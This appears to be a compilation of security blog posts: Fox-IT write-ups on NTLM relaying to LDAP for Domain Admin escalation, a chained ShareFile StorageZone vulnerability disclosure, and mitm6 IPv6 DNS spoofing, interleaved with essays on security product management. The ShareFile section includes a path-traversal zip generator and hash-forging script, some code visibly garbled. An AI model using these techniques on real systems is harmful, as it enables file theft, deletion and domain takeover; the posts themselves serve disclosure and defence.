These access rights are explained in depth in this whitepaper by the BloodHound team.
Updates to the tool that also exploit these privileges will be developed and released in the future.
The Invoke-ACLPwn tool can be downloaded from our GitHub here:


Last year we wrote about new additions to ntlmrelayx allowing relaying to LDAP, which allows for domain enumeration and escalation to Domain Admin by adding a new user to the Directory. Previously, the LDAP attack in ntlmrelayx would check if the relayed account was a member of the Domain Admins or Enterprise Admins group, and escalate privileges if this was the case. It did this by adding a new user to the Domain and adding this user to the Domain Admins group.
While this works, this does not take into account any special privileges that a relayed user might have. With the research presented in this post, we introduce a new attack method in ntlmrelayx. This attack involves first requesting the ACLs of important Domain objects, which are then parsed from their binary format into structures the tool can understand, after which the permissions of the relayed account are enumerated.
This takes into account all the groups the relayed account is a member of (including recursive group memberships). Once the privileges are enumerated, ntlmrelayx will check if the user has high enough privileges to allow for a privilege escalation of either a new or an existing user.
For this privilege escalation there are two different attacks. The first attack is called the ACL attack in which the ACL on the Domain object is modified and a user under the attackers control is granted Replication-Get-Changes-All privileges on the domain, which allows for using DCSync as desribed in the previous sections. If modifying the domain ACL is not possible, the access to add members to several high privilege groups in the domain is considered for a Group attack:

  • Enterprise Admins
  • Domain Admins
  • Backup Operators (who can back up critical files on the Domain Controller)
  • Account Operators (who have control over almost all groups in the domain)

If an existing user was specified using the --escalate-user flag, this user will be given the Replication privileges if an ACL attack can be performed, and added to a high-privilege group if a Group attack is used. If no existing user is specified, the options to create new users are considered. This can either be in the Users container (the default place for user accounts), or in an OrganizationalUnit for which control was delegated to for example IT department members.

One may have noticed that we mentioned relayed accounts here instead of relayed users. This is because the attack also works against computer accounts that have high privileges. An example for such an account is the computer account of an Exchange server, which is a member of the Exchange Windows Permissions group in the default configuration. If an attacker is in a position to convince the Exchange server to authenticate to the attacker’s machine, for example by using mitm6 for a network level attack, privileges can be instantly escalated to Domain Admin.

Relaying Exchange account

The NTDS.dit hashes can now be dumped by using impacket’s or with Mimikatz:


Similarly if an attacker has Administrative privileges on the Exchange Server, it is possible to escalate privilege in the domain without the need to dump any passwords or machine account hashes from the system.
Connecting to the attacker from the NT Authority\SYSTEM perspective and authenticating with NTLM is sufficient to authenticate to LDAP. The screenshot below shows the PowerShell function Invoke-Webrequest being called with, which will run from a SYSTEM perspective. The flag -UseDefaultCredentials will enable automatic authentication with NTLM.


The 404 error here is expected as serves a 404 page if the relaying attack is complete

It should be noted that relaying attacks against LDAP are possible in the default configuration of Active Directory, since LDAP signing, which partially mitigates this attack, is disabled by default. Even if LDAP signing is enabled, it is still possible to relay to LDAPS (LDAP over SSL/TLS) since LDAPS is considered a signed channel. The only mitigation for this is enabling channel binding for LDAP in the registry.
To get the new features in ntlmrelayx, simply update to the latest version of impacket from GitHub:


As for mitigation, Fox-IT has a few recommendations.

Remove dangerous ACLs
Check for dangerous ACLs with tools such as Bloodhound. 3
Bloodhound can make an export of all ACLs in the domain which helps identifying
dangerous ACLs.

Remove writeDACL permission for the Exchange Windows Permissions group
Remove the writeDACL permission for the Exchange Windows Permissions group. The following GitHub page contains a PowerShell script which can assist with this:

Monitor security groups
Monitor (the membership of) security groups that can have a high impact on the domain, such as the Exchange Trusted Subsystem and the Exchange Windows Permissions.

Audit and monitor changes to the ACL.
Audit changes to the ACL of the domain. If not done already, it may be necessary to modify the domain controller policy. More information about this can be found on the following TechNet article:

When the ACL of the domain object is modified, an event will be created with event ID 5136. The Windows event log can be queried with PowerShell, so here is a one-liner to get all events from the Security event log with ID 5136:

Get-WinEvent -FilterHashtable @{logname='security'; id=5136}

This event contains the account name and the ACL in a Security Descriptor Definition Language (SDDL) format.


Since this is unreadable for humans, there is a PowerShell cmdlet in Windows 10,
ConvertFrom-SDDL4, which converts the SDDL string into a more readable ACL object.


If the server runs Windows Server 2016 as operating system, it is also possible to see the original and modified descriptors. For more information:

With this information you should be able to start an investigation to discover what was modified, when that happened and the reason behind that.



Security Product Management at Large Companies vs. Startups

Is it better to perform product management of information security solutions at a large company or at a startup? Picking the setting that’s right for you isn’t as simple as craving the exuberant energy of a young firm or coveting the resources and brand of an organization that’s been around for a while. Each environment has its challenges and advantages for product managers. The type of innovation, nature of collaboration, sales dynamics, and cultural nuances are among the factors to consider when deciding which setting is best for you.

The perspective below is based on my product management experiences in the field information security, though I suspect it’s applicable to product managers in other hi-tech environments.

Product Management at a Large Firm

In the world of information security, industry incumbents are usually large organizations. This is in part because growing in a way that satisfies investors generally requires the financial might, brand and customer access that’s hard for small cyber-security companies to achieve. Moreover, customers who are not early adopters often find it easier to focus their purchasing on a single provider of unified infosec solutions. These dynamics set the context for the product manager’s role at large firms.

Access to Customers

Though the specifics differs across organizations, product management often involves defining capabilities and driving adoption. The product manager’s most significant advantage at a large company is probably access to customers. This is due to the size of the firm’s sales and marketing organization, as well as due to the large number of companies that have already purchased some of the company’s products.

Such access helps with understanding requirements for new products, improving existing technologies, and finding new customers. For example, you could bring your product to a new geography by using the sales force present in that area without having to hire a dedicated team. Also, it’s easier to upsell a complementary solution than build a new customer relationship from scratch.

Access to Expertise

Another benefit of a large organization is access to funds and expertise that’s sometimes hard to obtain in a young, small company. Instead of hiring a full-time specialist for a particular task, you might be able to draw upon the skills and experience of someone who supports multiple products and teams. In addition, assuming your efforts receive the necessary funding, you might find it easier to pursue product objectives and enter new markets in a way that could be hard for a startup to accomplish. This isn’t always easy, because budgetary planning in large companies can be more onerous than Venture Capitalist fund raising.

Organizational Structure

Working in any capacity at an established firm requires that you understand and follow the often-changing bureaucratic processes inherent to any large entity. Depending on the organization’s structure, product managers in such environments might lack the direct control over the teams vital to the success of their product. Therefore, the product manager needs to excel at forming cross-functional relationships and influencing indirectly. (Coincidentally, this is also a key skill-set for many Chief Information Security Officers.)

Sometimes even understanding all of your own objectives and success criteria in such environments can be challenging. It can be even harder to stay abreast of the responsibilities of others in the corporate structure. On the other hand, one of the upsides of a large organization is the room to grow one’s responsibilities vertically and horizontally without switching organizations. This is often impractical in small companies.

What It’s Like at a Large Firm

In a nutshell, these are the characteristics inherent to product management roles at large companies:

  • An established sales organization, which provides access to customers
  • Potentially-conflicting priorities and incentives with groups and individuals within the organization
  • Rigid organizational structure and bureaucracy
  • Potentially-easier access to funding for sophisticated projects and complex products
  • Possibly-easier access to the needed expertise
  • Well-defined career development roadmap

I loved working as a security product manager at a large company. I was able to oversee a range of in-house software products and managed services that focused on data security. One of my solutions involved custom-developed hardware, with integrated home-grown and third-party software, serviced a team of help desk and in-the-field technicians. A fun challenge!

I also appreciated the chance to develop expertise in the industries that my employer serviced, so I could position infosec benefits in the context relevant to those customers. I enjoyed staying abreast of the social dynamics and politics of a siloed, matrixed organization. After awhile I decided to leave because I was starting to feel a bit too comfortable. I also developed an appetite for risk and began craving the energy inherent to startups.

Product Management in a Startup

One of the most liberating, yet scary aspects of product management at a startup is that you’re starting the product from a clean slate. On the other hand, while product managers at established companies often need to account for legacy requirements and internal dependencies, a young firm is generally free of such entanglements, at least at the onset of its journey.

What markets are we targeting? How will we reach customers? What comprises the minimum viable product? Though product managers ask such questions in all types of companies, startups are less likely to survive erroneous answers in the long term. Fortunately, short-term experiments are easier to perform to validate ideas before making strategic commitments.

Experimenting With Capabilities

Working in a small, nimble company allows the product manager to quickly experiment with ideas, get them implemented, introduce them into the field, and gather feedback. In the world of infosec, rapidly iterating through defensive capabilities of the product is useful for multiple reasons, including the ability to assess—based on real-world feedback—whether the approach works against threats.

Have an idea that is so crazy, it just might work? In a startup, you’re more likely to have a chance to try some aspect of your approach, so you can rapidly determine whether it’s worth pursuing further. Moreover, given the mindshare that the industry’s incumbents have with customers, fast iterations help understand which product capabilities, delivered by the startup, the customers will truly value.

Fluid Responsibilities

In all companies, almost every individual has a certain role for which they’ve been hired. Yet, the specific responsibilities assigned to that role in a young firm often benefit from the person’s interpretation, and are based on the person’s strengths and the company’s need at a given moment. A security product manager working at a startup might need to assist with pre-sales activities, take a part in marketing projects, perform threat research and potentially develop proof-of-concept code, depending on what expertise the person possesses and what the company requires.

People in a small company are less likely to have the “it’s not my job attitude” than those in highly-structured, large organizations. A startup generally has fewer silos, making it easier to engage in activities that interest the person even if they are outside his or her direct responsibilities. This can be stressful and draining at times. On the other hand, it makes it difficult to get bored, and also gives the product manager an opportunity to acquire skills in areas tangential to product management. (For additional details regarding this, see my article What’s It Like to Join a Startup’s Executive Team?)

Customer Reach

Product manager’s access to customers and prospects at a startup tends to be more immediate and direct than at a large corporation. This is in part because of the many hats that the product manager needs to wear, sometimes acting as a sales engineer and at times helping with support duties. These tasks give the person the opportunity to hear unfiltered feedback from current and potential users of the product.

However, a young company simply lacks the scale of the sales force that accommodates reaching many customers until the firm builds up steam. (See Access to Customers above.) This means that the product manager might need to help identifying prospects, which can be outside the comfort zone of individuals who haven’t participated in sales efforts in this capacity.

What It’s Like at a Startup

Here are the key aspects of performing product management at a startup:

  • Ability and need to iterate faster to get feedback
  • Willingness and need to take higher risks
  • Lower bureaucratic burden and red tape
  • Much harder to reach customers
  • Often fewer resources to deliver on the roadmap
  • Fluid designation of responsibilities

I’m presently responsible for product management at Minerva Labs, a young endpoint security company. I’m loving the make-or-break feeling of the startup. For the first time, I’m overseeing the direction of a core product that’s built in-house, rather than managing a solution built upon third-party technology. It’s gratifying to be involved in the creation of new technology in such a direct way.

There are lots of challenges, of course, but every day feels like an adventure, as we fight for the seat at the big kids table, grow the customer base and break new ground with innovative anti-malware approaches. It’s a risky environment with high highs and low lows, but it feels like the right place for me right now.

Which Setting is Best for You?

Numerous differences between startups and large companies affect the experience of working in these firms. The distinction is highly pronounced for product managers, who oversee the creation of the solutions sold by these companies. You need to understand these differences prior to deciding which of the environments is best for you, but that’s just a start. Next, understand what is best for you, given where you are in life and your professional development. Sometimes the capabilities that you as a product manager will have in an established firm will be just right; at others, you will thrive in a startup. Work in the environment that appeals to you, but also know when (or whether) it’s time to make a change.

Compromising Citrix ShareFile on-premise via 7 chained vulnerabilities

A while ago we investigated a setup of Citrix ShareFile with an on-premise StorageZone controller. ShareFile is a file sync and sharing solution aimed at enterprises. While there are versions of ShareFile that are fully managed in the cloud, Citrix offers a hybrid version where the data is stored on-premise via StorageZone controllers. This blog describes how Fox-IT identified several vulnerabilities, which together allowed any account to (from the internet) access any file stored within ShareFile. Fox-IT disclosed these vulnerabilities to Citrix, which mitigated them via updates to their cloud platform. The vulnerabilities identified were all present in the StorageZone controller component, and thus cloud-only deployments were not affected. According to Citrix, several fortune-500 enterprises and organisations in the government, tech, healthcare, banking and critical infrastructure sectors use ShareFile (either fully in the Cloud or with an on-premise component).


Gaining initial access

After mapping the application surface and the flows, we decided to investigate the upload flow and the connection between the cloud and on-premise components of ShareFile. There are two main ways to upload files to ShareFile: one based on HTML5 and one based on a Java Applet. In the following examples we are using the Java based uploader. All requests are configured to go through Burp, our go-to tool for assessing web applications.
When an upload is initialized, a request is posted to the ShareFile cloud component, which is hosted at (where name is the name of the company using the solution):

Initialize upload

We can see the request contains information about the upload, among which is the filename, the size (in bytes), the tool used to upload (in this case the Java uploader) and whether we want to unzip the upload (more about that later). The response to this request is as follows:

Initialize upload response

In this response we see two different upload URLs. Both use the URL prefix (which is redacted here) that points to the address of the on-premise StorageZone controller. The cloud component thus generates a URL that is used to upload the files to the on-premise component.

The first URL is the ChunkUri, to which the individual chunks are uploaded. When the filetransfer is complete, the FinishUri is used to finalize the upload on the server. In both URLs we see the parameters that we submitted in the request such as the filename, file size, et cetera. It also contains an uploadid which is used to identify the upload. Lastly we see a h= parameter, followed by a base64 encoded hash. This hash is used to verify that the parameters in the URL have not been modified.

The unzip parameter immediately drew our attention. As visible in the screenshot below, the uploader offers the user the option to automatically extract archives (such as .zip files) when they are uploaded.

Extract feature

A common mistake made when extracting zip files is not correctly validating the path in the zip file. By using a relative path it may be possible to traverse to a different directory than intended by the script. This kind of vulnerability is known as a directory traversal or path traversal.

The following python code creates a special zip file called, which contains two files, one of which has a relative path.

import sys, zipfile
#the name of the zip file to generate
zf = zipfile.ZipFile('', 'w')
#the name of the malicious file that will overwrite the origial file (must exist on disk)
fname = 'xxe_oob.xml'
#destination path of the file
zf.write(fname, '../../../../testbestand_fox.tmp')
#random extra file (not required)
#example: dd if=/dev/urandom of=test.file bs=1024 count=600
fname = 'test.file'
zf.write(fname, 'tfile')

When we upload this file to ShareFile, we get the following message:

ERROR: Unhandled exception in upload-threaded-3.aspx - 'Access to the path '\\company.internal\data\testbestand_fox.tmp' is denied.'

This indicates that the StorageZone controller attempted to extract our file to a directory for which we lacked permissions, but that we were able to successfully change the directory to which the file was extracted. This vulnerability can be used to write user controlled files to arbitrary directories, provided the StorageZone controller has privileges to write to those directories. Imagine the default extraction path would be c:\appdata\citrix\sharefile\temp\ and we want to write to c:\appdata\citrix\sharefile\storage\subdirectory\ we can add a file with the name ../storage/subdirectory/filename.txt which will then be written to the target directory. The ../ part indicates that the Operating System should go one directory higher in the directory tree and use the rest of the path from that location.

Vulnerability 1: Path traversal in archive extraction

From arbitrary write to arbitrary read

While the ability to write arbitrary files to locations within the storage directories is a high-risk vulnerability, the impact of this vulnerability depends on how the files on disk are used by the application and if there are sufficient integrity checks on those files. To determine the full impact of being able to write files to the disk we decided to look at the way the StorageZone controller works. There are three main folders in which interesting data is stored:

  • files
  • persistenstorage
  • tokens

The first folder, files, is used to store temporary data related to uploads. Files already uploaded to ShareFile are stored in the persistentstorage directory. Lastly the tokens folder contains data related to tokens which are used to control the downloads of files.

When a new upload was initialized, the URLs contained a parameter called uploadid. As the name already indicates this is the ID assigned to the upload, in this case it is rsu-2351e6ffe2fc462492d0501414479b95. In the files directory, there are folders for each upload matching with this ID.

In each of these folders there is a file called info.txt, which contains information about our upload:


In the info.txt file we see several parameters that we saw previously, such as the uploadid, the file name, the file size (13 bytes), as well as some parameters that are new. At the end, we see a 32 character long uppercase string, which hints at an integrity hash for the data.
We see two other IDs, fi591ac5-9cd0-4eb7-a5e9-e5e28a7faa90 and fo9252b1-1f49-4024-aec4-6fe0c27ce1e6, which correspond with the file ID for the upload and folder ID to which the file is uploaded respectively.

After trying to figure out for a while what kind of hashing algorithm was used for the integrity check of this file, it turned out that it is a simple md5 hash of the rest of the data in the info.txt file. The twist here is that the data is encoded with UTF-16-LE, which is default for Unicode strings in Windows.

Armed with this knowledge we can write a simple python script which calculates the correct hash over a modified info.txt file and write this back to disk:

import md5
with open('info_modified.txt','r') as infile:
instr ='|')
instr2 = u'|'.join(instr[:-1])
outhash ='utf-16-le')).hexdigest().upper()
with open('info_out.txt','w') as outfile:
outfile.write('%s|%s' % (instr2, outhash))

Here we find our second vulnerability: the info.txt file is not verified for integrity using a secret only known by the application, but is only validated with an md5 hash against corruption. This gives an attacker that can write to the storage folders the possibility to alter the upload information.

Vulnerability 2: Integrity of data files (info.txt) not verified

Since our previous vulnerability enabled us to write files to arbitrary locations, we can upload our own info.txt and thus modify the upload information.
It turns out that when uploading data, the file ID fi591ac5-9cd0-4eb7-a5e9-e5e28a7faa90 is used as temporary name for the file. The data that is uploaded is written to this file, and when the upload is finilized this file is added to the users ShareFile account. We are going to attempt another path traversal here. Using the script above, we modify the file ID to a different filename to attempt to extract a test file called secret.txt which we placed in the files directory (one directory above the regular location of the temporary file). The (somewhat redacted) info.txt then becomes:

modified info.txt

When we subsequently post to the upload-threaded-3.aspx page to finalize the upload, we are presented with the following descriptive error:

File size does not match

Apparently, the filesize of the secret.txt file we are trying to extract is 14 bytes instead of 13 as the modified info.txt indicated. We can upload a new info.txt file which does have the correct filesize, and the secret.txt file is succesfully added to our ShareFile account:

File extraction POC

And thus we’ve successfully exploited a second path traversal, which is in the info.txt file.

Vulnerability 3: Path traversal in info.txt data

By now we’ve turned our ability to write arbitrary files to the system into the ability to read arbitrary files, as long as we do know the filename. It should be noted that all the information in the info.txt file can be found by investigating traffic in the web interface, and thus an attacker does not need to have an info.txt file to perform this attack.

Investigating file downloads

So far, we’ve only looked at uploading new files. The downloading of files is also controlled by the ShareFile cloud component, which instructs the StorageZone controller to serve the frequested files. A typical download link looks as follows:

Download URL

Here we see the dt parameter which contains the download token. Additionally there is a h parameter which contains a HMAC of the rest of the URL, to prove to the StorageZone controller that we are authorized to download this file.

The information for the download token is stored in an XML file in the tokens directory. An example file is shown below:

<!--?xml version="1.0" encoding="utf-8"?--><!--?xml version="1.0" encoding="utf-8"?--><?xml version="1.0" encoding="utf-8"?>
<ShareFileDownloadInfo authSignature="866f075b373968fcd2ec057c3a92d4332c8f3060" authTimestamp="636343218053146994">
<UserAgent>Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0</UserAgent>
<Item key="operatingsystem" value="Linux" />
<IrmPolicyServerUrl />
<IrmAccessId />
<IrmAccessKey />
<File name="testfile" path="a4ea881a-a4d5-433a-fa44-41acd5ed5a5f\0f\0f\fi0f0f2e_3477_4647_9cdd_e89758c21c37" size="61" id="" />
<ShareID />

Two things are of interest here. The first is the path property of the File element, which specifies which file the token is valid for. The path starts with the ID a4ea881a-a4d5-433a-fa44-41acd5ed5a5f which is the ShareFile AccountID, which is unique per ShareFile instance. Then the second ID fi0f0f2e_3477_4647_9cdd_e89758c21c37 is unique for the file (hence the fi prefix), with two 0f subdirectories for the first characters of the ID (presumably to prevent huge folder listings).

The second noteworthy point is the authSignature property on the ShareFileDownloadInfo element. This suggests that the XML is signed to ensure its authenticity, and to prevent malicious tokens from being downloaded.

At this point we started looking at the StorageZone controller software itself. Since it is a program written in .NET and running under IIS, it is trivial to decompile the binaries with toos such as JustDecompile. While we obtained the StorageZone controller binaries from the server the software was running on, Citrix also offers this component as a download on their website.

In the decompiled code, the functions responsible for verifying the token can quickly be found. The feature to have XML files with a signature is called AuthenticatedXml by Citrix. In the code we find that a static key is used to verify the integrity of the XML file (which is the same for all StorageZone controllers):

Static MAC secret

Vulnerability 4: Token XML files integrity integrity not verified

During our research we of course attempted to simply edit the XML file without changing the signature, and it turned out that it is not nessecary to calculate the signature as an attacker, since the application simply tells you what correct signature is if it doesn’t match:

Signature disclosure

Vulnerability 5: Debug information disclosure

Furthermore, when we looked at the code which calculates the signature, it turned out that the signature is calculated by prepending the secret to the data and calculating a sha1 hash over this. This makes the signature potentially vulnerable to a hash length extension attack, though we did not verify this in the time available.

Hashing of secret prepended

Even though we didn’t use it in the attack chain, it turned out that the XML files were also vulnerable to XML External Entity (XXE) injection:

XXE error

Vulnerability 6 (not used in the chain): Token XML files vulnerable to XXE

In summary, it turns out that the token files offer another avenue to download arbitrary files from ShareFile. Additionally, the integrity of these files is insufficiently verified to protect against attackers. Unlike the previously described method which altered the upload data, this method will also decrypt encrypted files if encrypted storage is enabled within ShareFile.

Getting tokens and files

At this point we are able to write arbitrary files to any directory we want and to download files if the path is known. The file path however consists of random IDs which cannot be guessed in a realistic timeframe. It is thus still necessary for an attacker to find a method to enumerate the files stored in ShareFile and their corresponding IDs.

For this last step, we go back to the unzip functionality. The code responsible for extracting the zip file is (partially) shown below.

Unzip code

What we see here is that the code creates a temporary directory to which it extracts the files from the archive. The uploadId parameter is used here in the name of the temporary directory. Since we do not see any validation taking place of this path, this operation is possibly vulnerable to yet another path traversal. Earlier we saw that the uploadId parameter is submitted in the URL when uploading files, but the URL also contains a HMAC, which makes modifying this parameter seemingly impossible:


However, let’s have a look at the implementation first. The request initially passes through the ValidateRequest function below:

Validation part 1

Which then passes it to the second validation function:

Validation part 2

What happens here is that the h parameter is extracted from the request, which is then used to verify all parameters in the url before the h parameter. Thus any parameters following the h in the URL are completely unverified!

So what happens when we add another parameter after the HMAC? When we modify the URL as follows:


We get the following message:

{"error":true,"errorMessage":"upload-threaded-2.aspx: ID='rsu-becc299a4b9c421ca024dec2b4de7376,foxtest' Unrecognized Upload ID.","errorCode":605}

So what happens here? Since the uploadid parameter is specified multiple times, IIS concatenates the values which are separated with a comma. Only the first uploadid parameter is verified by the HMAC, since it operates on the query string instead of the individual parameter values, and only verifies the portion of the string before the h parameter. This type of vulnerability is known as HTTP Parameter Polution.

Vulnerability 7: Incorrectly implemented URL verification (parameter pollution)

Looking at the upload logic again, the code calls the function UploadLogic.RecursiveIteratePath after the files are extracted to the temporary directory, which recursively adds all the files it can find to the ShareFile account of the attacker (some code was cut for readability):

Recursive iteration

To exploit this, we need to do the following:

  • Create a directory called rsu-becc299a4b9c421ca024dec2b4de7376, in the files directory.
  • Upload an info.txt file to this directory.
  • Create a temporary directory called ulz-rsu-becc299a4b9c421ca024dec2b4de7376,.
  • Perform an upload with an added uploadid parameter pointing us to the tokens directory.

The creation of directories can be performed with the directory traversal that was initially identified in the unzip operation, since this will create any non-existing directories. To perform the final step and exploit the third path traversal, we post the following URL:

Upload ID path traversal

Side note: we use tokens_backup here because we didn’t want to touch the original tokens directory.

Which returns the following result that indicates success:

Upload ID path traversal result

Going back to our ShareFile account, we now have hundreds of XML files with valid download tokens available, which all link to files stored within ShareFile.

Download tokens

Vulnerability 8: Path traversal in upload ID

We can download these files by modifying the path in our own download token files for which we have the authorized download URL.
The only side effect is that adding files to the attackers account this way also recursively deletes all files and folders in the temporary directory. By traversing the path to the persistentstorage directory it is thus also possible to delete all files stored in the ShareFile instance.


By abusing a chain of correlated vulnerabilities it was possible for an attacker with any account allowing file uploads to access all files stored by the ShareFile on-premise StorageZone controller.

Based on our research that was performed for a client, Fox-IT reported the following vulnerabilities to Citrix on July 4th 2017:

  1. Path traversal in archive extraction
  2. Integrity of data files (info.txt) not verified
  3. Path traversal in info.txt data
  4. Token XML files integrity integrity not verified
  5. Debug information disclosure (authentication signatures, hashes, file size, network paths)
  6. Token XML files vulnerable to XXE
  7. Incorrectly implemented URL verification (parameter pollution)
  8. Path traversal in upload ID

Citrix was quick with following up on the issues and rolling out mitigations by disabling the unzip functionality in the cloud component of ShareFile. While Fox-IT identified several major organisations and enterprises that use ShareFile, it is unknown if they were using the hybrid setup in a vulnerable configuration. Therefor, the number of affected installations and if these issues were abused is unknown.

Disclosure timeline

  • July 4th 2017: Fox-IT reports all vulnerabilities to Citrix
  • July 7th 2017: Citrix confirms they are able to reproduce vulnerability 1
  • July 11th 2017: Citrix confirms they are able to reproduce the majority of the other vulnerabilities
  • July 12th 2017: Citrix deploys an initial mitigation for vulnerability 1, breaking the attack chain. Citrix informs us the remaining findings will be fixed on a later date as defense-in-depth measures
  • October 31st 2017: Citrix deploys additional fixes to the cloud-based ShareFile components
  • April 6th 2018: Disclosure

CVE: To be assigned

Practical Tips for Creating and Managing New Information Technology Products

This cheat sheet offers advice for product managers of new IT solutions at startups and enterprises. To print it, use the one-page PDF version; you can also edit the Word version to customize it for you own needs.

Responsibilities of a Product Manager

  • Determine what to build, not how to build it.
  • Envision the future pertaining to product domain.
  • Align product roadmap to business strategy.
  • Define specifications for solution capabilities.
  • Prioritize feature requirements, defect correction, technical debt work and other development efforts.
  • Help drive product adoption by communicating with customers, partners, peers and internal colleagues.
  • Participate in the handling of issue escalations.
  • Sometimes take on revenue or P&L responsibilities.

Defining Product Capabilities

  • Understand gaps in the existing products within the domain and how customers address them today.
  • Understand your firm’s strengths and weaknesses.
  • Research the strengths and weaknesses of your current and potential competitors.
  • Define the smallest set of requirements for the initial (or next) release (minimum viable product).
  • When defining product requirements, balance long-term strategic needs with short-term tactical ones.
  • Understand your solutions key benefits and unique value proposition.

Strategic Market Segmentation

  • Market segmentation often accounts for geography, customer size or industry verticals.
  • Devise a way of grouping customers based on the similarities and differences of their needs.
  • Also account for the similarities in your capabilities, such as channel reach or support abilities.
  • Determine which market segments you’re targeting.
  • Understand similarities and differences between the segments in terms of needs and business dynamics.
  • Consider how you’ll reach prospective customers in each market segment.

Engagement with the Sales Team

  • Understand the nature and size of the sales force aligned with your product.
  • Explore the applicability and nature of a reseller channel or OEM partnerships for product growth.
  • Understand sales incentives pertaining to your product and, if applicable, attempt to adjust them.
  • Look for misalignments, such as recurring SaaS product pricing vs. traditional quarterly sales goals.
  • Assess what other products are “competing” for the sales team’s attention, if applicable.
  • Determine the nature of support you can offer the sales team to train or otherwise support their efforts.
  • Gather sales’ negative and positive feedback regarding the product.
  • Understand which market segments and use-cases have gained the most traction in the product’s sales.

The Pricing Model

  • Understand the value that customers in various segments place on your product.
  • Determine your initial costs (software, hardware, personnel, etc.) related to deploying the product.
  • Compute your ongoing costs related to maintaining the product and supporting its users.
  • Decide whether you will charge customers recurring or one-time (plus maintenance) fees for the product.
  • Understand the nature of customers’ budgets, including any CapEx vs. OpEx preferences.
  • Define the approach to offering volume pricing discounts, if applicable.
  • Define the model for compensating the sales team, including resellers, if applicable.
  • Establish the pricing schedule, setting the priced based on perceived value.
  • Account for the minimum desired profit margin.

Product Delivery and Operations

  • Understand the intricacies of deploying the solution.
  • Determine the effort required to operate, maintain and support the product on an ongoing basis.
  • Determine for the technical steps, personnel, tools, support requirements and the associated costs.
  • Document the expectations and channels of communication between you and the customer.
  • Establish the necessary vendor relationship for product delivery, if necessary.
  • Clarify which party in the relationship has which responsibilities for monitoring, upgrades, etc.
  • Allocate the necessary support, R&D, QA, security and other staff to maintain and evolve the product.
  • Obtain the appropriate audits and certifications.

Product Management at Startups

  • Ability and need to iterate faster to get feedback
  • Willingness and need to take higher risks
  • Lower bureaucratic burden and red tape
  • Much harder to reach customers
  • Often fewer resources to deliver on the roadmap
  • Fluid designation of responsibilities

Product Management at Large Firms

  • An established sales organization, which provides access to customers
  • Potentially-conflicting priorities and incentives with groups and individuals within the organization
  • Rigid organizational structure and bureaucracy
  • Potentially-easier access to funding for sophisticated projects and complex products
  • Possibly-easier access to the needed expertise
  • Well-defined career development roadmap


Authored by Lenny Zeltser, who’ve been responsible for product management of information security solutions at companies large and small. This cheat sheet, version 1.0, is released under the Creative Commons v3 “Attribution” License.

mitm6 – compromising IPv4 networks via IPv6

While IPv6 adoption is increasing on the internet, company networks that use IPv6 internally are quite rare. However, most companies are unaware that while IPv6 might not be actively in use, all Windows versions since Windows Vista (including server variants) have IPv6 enabled and prefer it over IPv4. In this blog, an attack is presented that abuses the default IPv6 configuration in Windows networks to spoof DNS replies by acting as a malicious DNS server and redirect traffic to an attacker specified endpoint. In the second phase of this attack, a new method is outlined to exploit the (infamous) Windows Proxy Auto Discovery (WPAD) feature in order to relay credentials and authenticate to various services within the network. The tool Fox-IT created for this is called mitm6, and is available from the Fox-IT GitHub.

IPv6 attacks

Similar to the slow IPv6 adoption, resources about abusing IPv6 are much less prevalent than those describing IPv4 pentesting techniques. While every book and course mentions things such as ARP spoofing, IPv6 is rarely touched on and the tools available to test or abuse IPv6 configurations are limited. The THC IPV6 Attack toolkit is one of the available tools, and was an inspiration for mitm6. The attack described in this blog is a partial version of the SLAAC attack, which was first described by in 2011 by Alex Waters from the Infosec institute. The SLAAC attack sets up various services to man-in-the-middle all traffic in the network by setting up a rogue IPv6 router. The setup of this attack was later automated with a tool by Neohapsis called suddensix.

The downside of the SLAAC attack is that it attempts to create an IPv6 overlay network over the existing IPv4 network for all devices present. This is hardly a desired situation in a penetration test since this rapidly destabilizes the network. Additionally the attack requires quite a few external packages and services to work. mitm6 is a tool which focusses on an easy to setup solution that selectively attacks hosts and spoofs DNS replies, while minimizing the impact on the network’s regular operation. The result is a python script which requires almost no configuration to set up, and gets the attack running in seconds. When the attack is stopped, the network reverts itself to it’s previous state within minutes due to the tweaked timeouts set in the tool.

The mitm6 attack

Attack phase 1 – Primary DNS takeover

mitm6 starts with listening on the primary interface of the attacker machine for Windows clients requesting an IPv6 configuration via DHCPv6. By default every Windows machine since Windows Vista will request this configuration regularly. This can be seen in a packet capture from Wireshark:


mitm6 will reply to those DHCPv6 requests, assigning the victim an IPv6 address within the link-local range. While in an actual IPv6 network these addresses are auto-assigned by the hosts themselves and do not need to be configured by a DHCP server, this gives us the opportunity to set the attackers IP as the default IPv6 DNS server for the victims. It should be noted that mitm6 currently only targets Windows based operating systems, since other operating systems like macOS and Linux do not use DHCPv6 for DNS server assignment.

mitm6 does not advertise itself as a gateway, and thus hosts will not actually attempt to communicate with IPv6 hosts outside their local network segment or VLAN. This limits the impact on the network as mitm6 does not attempt to man-in-the-middle all traffic in the network, but instead selectively spoofs hosts (the domain which is filtered on can be specified when running mitm6).

The screenshot below shows mitm6 in action. The tool automatically detects the IP configuration of the attacker machine and replies to DHCPv6 requests sent by clients in the network with a DHCPv6 reply containing the attacker’s IP as DNS server. Optionally it will periodically send Router Advertisment (RA) messages to alert client that there is an IPv6 network in place and that clients should request an IPv6 adddress via DHCPv6. This will in some cases speed up the attack but is not required for the attack to work, making it possible to execute this attack on networks that have protection against the SLAAC attack with features such as RA Guard.


Attack phase 2 – DNS spoofing

On the victim machine we see that our server is configured as DNS server. Due to the preference of Windows regarding IP protocols, the IPv6 DNS server will be preferred to the IPv4 DNS server. The IPv6 DNS server will be used to query both for A (IPv4) and AAAA (IPv6) records.


Now our next step is to get clients to connect to the attacker machine instead of the legitimate servers. Our end goal is getting the user or browser to automatically authenticate to the attacker machine, which is why we are spoofing URLs in the internal domain testsegment.local. On the screenshot in step 1 you see the client started requesting information about wpad.testsegment.local immediately after it was assigned an IPv6 address. This is the part we will be exploiting during this attack.

Exploiting WPAD

A (short) history of WPAD abuse

The Windows Proxy Auto Detection feature has been a much debated one, and one that has been abused by penetration testers for years. Its legitimate use is to automatically detect a network proxy used for connecting to the internet in corporate environments. Historically, the address of the server providing the wpad.dat file (which provides this information) would be resolved using DNS, and if no entry was returned, the address would be resolved via insecure broadcast protocols such as Link-Local Multicast Name Resolution (LLMNR). An attacker could reply to these broadcast name resolution protocols, pretend the WPAD file was located on the attackers server, and then prompt for authentication to access the WPAD file. This authentication was provided by default by Windows without requiring user interaction. This could provide the attacker with NTLM credentials from the user logged in on that computer, which could be used to authenticate to services in a process called NTLM relaying.

